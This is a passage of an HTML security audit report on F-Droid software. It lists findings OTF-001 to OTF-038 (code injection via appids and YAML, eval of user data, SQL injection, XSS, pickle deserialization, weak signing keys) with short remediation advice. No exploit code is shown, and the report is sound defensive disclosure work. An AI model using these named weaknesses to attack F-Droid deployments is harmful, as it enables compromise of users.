</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Low</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f42-stronger-regular-expression-recommended" style="color: #e2632a;">OTF-038</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Weak regular expression</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Regular expression used for filtering file name entries in zipsigner appears to be permissive.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Low</div></td></tr></tbody></table></div>
</div>
<a name="recommendationSummary"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>1.7</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Summary of Recommendations</div></td></tr></table></div>
<div><table style="margin-bottom: 1.3cm; border-color: #444444; border-width: 1pt; border-style: solid;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>ID</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Type</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Recommendation</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f8-evasion-of-bleach-sanitizer-in-repomaker" style="color: #e2632a;">OTF-001</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Upgrade to a version of Bleach which fixes this bug.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f14-shell-code-injection-via-malicious-appids-into-fdroidserver" style="color: #e2632a;">OTF-002</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Validate appids</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f23-code-injection-in-fdroidserver-metadata-yaml-parsing" style="color: #e2632a;">OTF-003</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Use <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">yaml.safe_load</span> instead.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f25-infoleak-in-fdroidserver-checkupdates-py" style="color: #e2632a;">OTF-004</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Infoleak</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Recommendation: restrict URLs to HTTP(S) schemes.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f26-code-injection-in-fdroidserver-checkupdates-py-through-eval--ed-user-supplied-data" style="color: #e2632a;">OTF-005</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Create a simple interpreter for the allowed rules, or do strict validation of the input.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f27-code-injection-via-malicious-appid-in-fdroidserver-build-py" style="color: #e2632a;">OTF-006</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Validate appids</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f29-javascript-injection-into-htmlified-package-descriptions-in-fdroidserver-metadata-py" style="color: #e2632a;">OTF-007</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Recommendation: validate the URL and disallow schemas like <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">javascript:</span> and <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">file:</span>, possibly using a whitelist.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f33-bluetoothserver-java-request-uri-included-in-response" style="color: #e2632a;">OTF-008</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>html/JavaScript Injection</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>User supplied URI should be parsed and components validated before including it in the response.
Alternatively, URLEncode or httpencode the URI.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f39-trustonfirstuse-tofu-usage" style="color: #e2632a;">OTF-009</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Unverified trust</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Use a mechanism similar to asking for pin before pairing two devices through BlueTooth, for mobile based repos.
For non-mobile based repos, the TOFU key should not be stored permanently.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f49--fdroid-client-exploiting-nearby-swap-feature-to-show-malicious-prompt-to-users-or-redirect-to-malicious-sites" style="color: #e2632a;">OTF-010</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Malicious Use of Feature</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>The application should validate the message being shown to the user and its origin. Also accepting any message or domain from a user and redirecting the user to a different domain is a very insecure implementation. The users should not be redirected to any domain given by the other user. A validation of this parameter is also needed to be implemented.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f12-weak-regexps-filtering-xss-and-unwanted-html-tags-in-fdroidserver-lint-py" style="color: #e2632a;">OTF-011</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Deploy bleach against the descriptions.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f13-key-alias-collisions-can-lead-to-dos-of-publishing-in-fdroidserver" style="color: #e2632a;">OTF-012</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Denial of Service</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Either use longer ids, or don't make the ids depending on user input.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f15-image-bomb-can-lead-to-dos-in-fdroidserver-update-py" style="color: #e2632a;">OTF-013</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Denial of Service</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Check for size of images before processing, set ulimit and disk quota.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f17-insecure-usage-of-temporary-file-directory-in-fdroidserver-docker-drozer-py" style="color: #e2632a;">OTF-014</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Denial of Service</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Generate export files in a dedicated folder with restrictive access permissions.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f20-parsing-untrusted-xml-data-in-fdroidserver" style="color: #e2632a;">OTF-015</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Denial of Service</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Replace these with its defusedxml equivalent function or - only applicable to xml.* modules - make sure defusedxml.defuse_stdlib() is called.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f30-downloader-download-file-type-and-size-are-not-verified" style="color: #e2632a;">OTF-016</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Arbitrary file download</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Only allow certain types of files to be transmitted (whitelisting) if possible.
Limit the size of file to be transmitted, and warn the user for large files.
The issue should be fixed in the parent class, and the subclasses should perform some content type check, to avoid malicious file/app installation on the victim device.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f31-bluetoothclient-java-insecure-rfcomm-socket-is-used-for-bluetooth-connection" style="color: #e2632a;">OTF-017</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Insecure communication</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
An out of band key sharing mechanism, such as sharing a password protected file over insecure RFComm socket, containing a symmetric encryption key, can be used to exchange keys between untrusted devices, instead of TOFU.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f32-bluetoothserver-java-insecure-rfcomm-socket-used-for-bluetooth-connection" style="color: #e2632a;">OTF-018</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Insecure communication</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
An out of band key sharing mechanism, such as sharing a password protected file over insecure RFComm socket, containing a symmetric encryption key, can be used to exchange keys between untrusted devices, instead of TOFU.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f35-potential-sql-injection" style="color: #e2632a;">OTF-019</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>SQL Injection</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Use prepared statements for DB query preparation.
Validate the strings with white listing before using in SQL query.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f41-app-uses-data-from-clipboard" style="color: #e2632a;">OTF-020</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>URI redirect</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
If this feature is not needed, it should be removed.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f43-file-deleted-unconditionally" style="color: #e2632a;">OTF-021</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>File deletion</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
On finding that the output file exists, the function should return error and let higher level code handle the error. Alternatively, the code should add a random suffix to the output file name if the specified file exists.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f44-secure-temp-file-usage-recommended" style="color: #e2632a;">OTF-022</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Insecure temp file</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
FILE class in Java allows creation of subdirs, and setting specific permissions on created files. It is recommended to create the temp files within app specific subdirectory, for example "Fdroid" under global tmp folder. This subfolder can be created with restricted permissions for owner only, to create other temporary files with restricted permissions within this app-specific folder.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f46--fdroidclient-app-is-signed-with-sha1withrsa-known-to-have-collision-issues" style="color: #e2632a;">OTF-023</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Cryptography</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>It is recommended to update to a stronger signing key for this Android app. The old default RSA 1024-bit key is weak and officially deprecated.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f47--fdroidclient-raw-sql-query-executions" style="color: #e2632a;">OTF-024</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>SQL Injection</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>It is recommended to never use the unvalidated user input inside a SQL query and execute it. The best way to make sure adversaries will not be able to inject unsolicited SQL syntax into your queries is to avoid using SQLiteDatabase.rawQuery() instead opting for a parameterized statement.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f48--fdroid-client-snooping-in-between-clients-in-nearby-swap-" style="color: #e2632a;">OTF-025</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Malicious Use of Feature</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>The way the feature has been implemented is prone to different attacks. It is suggested to not directly open a web server and allow everyone to access. Some authentication should be applied.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f52--fdroid-client-insecure-implementation-of-ssl" style="color: #e2632a;">OTF-026</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Transport Layer Security</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
A better security practice is to include an SSL certificate inside the application build.
Then check and trust only that certificate at runtime. This is known as SSL pinning.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f53--privilege-extension-app-is-signed-with-sha1withrsa-known-to-have-collision-issues" style="color: #e2632a;">OTF-027</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Cryptography</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>It is recommended to update to a stronger signing key for this Android app. The old default RSA 1024-bit key is weak and officially deprecated. SHA256 is a better algorithm to use
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f1-tabnabbing-in-repomaker" style="color: #e2632a;">OTF-028</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Tabnabbing</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Use <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">rel="noopener"</span> when using <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">target="_blank"</span>
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f9-repomaker-apk-_def_get_type-allows-for-mime-type-mismatches" style="color: #e2632a;">OTF-029</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Malicious File Upload</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Check if the mime type matches the extension.
Use a white-list instead of a blacklist of extensions.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f10-unsafe-html-rendering-of-arbitrary-input" style="color: #e2632a;">OTF-030</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
clean the name and data_list contents before rendering.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f16-dangerous-deserialization-using-python-pickle-in-fdroidserver-update-py" style="color: #e2632a;">OTF-031</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Dangerous Function</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Avoid the usage of the python pickle module</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f19-starting-a-process-with-a-partial-executable-path" style="color: #e2632a;">OTF-032</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Execution without path</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Establish a list of all good paths once (during installation), store it in a file with secure permissions and use this to call the external programs.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f24-maliciously-crafted-appid-code-injection-in-fdroidserver-build-py" style="color: #e2632a;">OTF-033</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Validate appids.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f34-bluetootheserver-java-file-in-response-without-size-of-type-check" style="color: #e2632a;">OTF-034</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Arbitrary file in response</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Only allow certain types of files to be transmitted (whitelisting) if possible.
Limit the size of file to be transmitted, and warn the user for large files.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f36-no-mechanism-to-remove-root-ca-keys" style="color: #e2632a;">OTF-035</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Hardcoded keys</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Provide key revocation list check. Alternatively, list the root CA keys in a separate file which can be updated independently.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f37-use-of-rot13-and-base64-encoding" style="color: #e2632a;">OTF-036</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Weak data protection</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
If the data being protected is sensitive, stronger encryption methods should be used.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f38-untrusted-external-links" style="color: #e2632a;">OTF-037</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Unverified remote resources</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Documented manual review of external links before accepting a MR/PR/update/patch should be in place, and warning should be displayed to user when they click on the external links.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f42-stronger-regular-expression-recommended" style="color: #e2632a;">OTF-038</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Weak regular expression</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
